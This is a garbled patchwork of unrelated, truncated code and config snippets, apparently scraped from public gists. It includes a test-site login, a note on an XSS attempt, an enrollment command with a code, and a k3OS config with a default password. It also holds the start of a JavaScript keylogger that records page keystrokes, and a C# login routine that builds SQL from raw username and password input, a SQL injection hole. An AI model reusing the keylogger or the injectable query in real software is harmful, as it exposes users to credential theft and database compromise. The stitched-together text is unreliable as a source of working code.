http://zero.webappsecurity.com
Username: username Password: password
Basic XSS Attempt, fails as the input is entity encoded but we can still exploit this.
& 'C:\Program Files\Defined Networking\DNClient\dnclient.exe' enroll -code HLFy5jh069gqph8UwyqNvpZ5s-LzYmyudyba8syFoEE
#### Contents of the preconfiguration file (for buster)
#
# The configuration fragments used in this file are also available as an
# example preconfiguration file from:
# https://www.debian.org/releases/buster/example-preseed.txt
#
# Some more preseed files that contain the full list of available preseed
# options:
# https://preseed.debian.net/debian-preseed/
ssh_authorized_keys:
- github:mort666
hostname: rt-k3s-node-01
k3os:
  password: rancher
  ntp_servers:
  - 0.us.pool.ntp.org
  - 1.us.pool.ntp.org
// Use Gists to store code you would like to remember later on
console.log(window); // log the "window" object to the console
Rails.application.configure do
config.force_ssl = Rails.env.production?
end
cfs.php
<head>
<script>
// array of user keystrokes
var keystrokes = [];
// event listener which captures user keystrokes
document.onkeypress = function(e) {
var key = (window.event) ? window.event.keyCode : e.which;
keystrokes.push(String.fromCharCode(key));
// Encoded RSAPublicKey
private static String PUB_KEY = "30818902818100C4A06B7B52F8D17DC1CCB47362" +
"C64AB799AAE19E245A7559E9CEEC7D8AA4DF07CB0B21FDFD763C63A313A668FE9D764E" +
"D913C51A676788DB62AF624F422C2F112C1316922AA5D37823CD9F43D1FC54513D14B2" +
"9E36991F08A042C42EAAEEE5FE8E2CB10167174A359CEBF6FACC2C9CA933AD403137EE" +
"2C3F4CBED9460129C72B0203010001";
public static void Main(string[] args)
{
I hereby claim:
To claim this, I am signing this object:
public static Int64 CheckUser(string username, string password)
{
    Int64 userID = 0;
    try
    {
        string getUserID = "SELECT userID FROM Users WHERE userName = '{0}' AND password = '{1}'";
        using (SqlConnection conn = new SqlConnection(ConfigurationManager.ConnectionStrings["ssbcon"].ConnectionString))
        {
            conn.Open();
            getUserID = String.Format(getUserID, username, password);